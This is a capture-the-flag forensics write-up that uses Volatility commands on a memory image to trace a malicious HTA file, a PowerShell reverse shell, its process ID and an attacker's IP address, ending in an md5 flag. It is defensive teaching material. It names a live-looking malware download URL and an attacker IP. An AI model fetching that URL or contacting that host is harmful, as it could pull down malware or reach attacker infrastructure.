vol.py -f honeypot.raw imageinfo

After finding out what kind of image we are dealing with, I usually first check to see what processes were running.
vol.py -f honeypot.raw --profile=Win7SP1x86_23418 pslist

We can see some iexplore.exe processes. To be expected considering there was a URL used to download a malware. I also see powershell and whoami being run. Will make a note of that.

Let's see what ports and connections we have listening or established. Especially in this case since the description asks us to find a process PID.
vol.py -f honeypot.raw --profile=Win7SP1x86_23418 netscan

Made a note of a strange quad 4 port.

Since Santa downloaded a malware and the challenges asks us to find a URL, let's check the Internet Exploder history as well.
vol.py -f honeypot.raw --profile=Win7SP1x86_23418 iehistory

I'm always wary of .hta files so this jumped out at me.

So we know iexplore.exe was used with PID 3344 to download an hta file.

Let's try to find the file

vol.py -f honeypot.raw --profile=Win7SP1x86_23418 filescan|grep -i .hta

We find it so let's dump its contents

vol.py -f honeypot.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x3f4d4348 -n "christmas_update[1].hta"

Would you look at that. That looks like a powershell reverse shell. We are on the right track.

Base64 decoding the string, we find it is downloading and executing a file called update.ps1


We can't find the file in memory.
vol.py -f honeypot.raw --profile=Win7SP1x86_23418 filescan|grep -i update.ps1

Back to netscan we notice a lot of powershell.exe processes with PID 2700. Because a ps1 reverse shell was downloaded, it would be running with powershell which has PID 2700. So I dumped the memory of that PID.

vol.py -f honeypot.raw --profile=Win7SP1x86_23418 memdump -p 2700 -D .
And we can see the actual content of the script that was run by powershell.

We have our IP:

Putting all this information together as the challenge requires us.

The URL used to download the malware: https://windowsliveupdater.com/christmas_update.hta
The malicious process PID: 2700
The attacker's IP:

Putting it all together it looks like this: https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189

However the flag is supposed to be the md5sum of that.

echo "https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189"|md5sum


Original writeup (https://github.com/LazyTitan33/CTF-Writeups/blob/main/HTB%20-%20Cyber%20Santa%20is%20Coming%20to%20Town%202021/Forensics/Honeypot.md).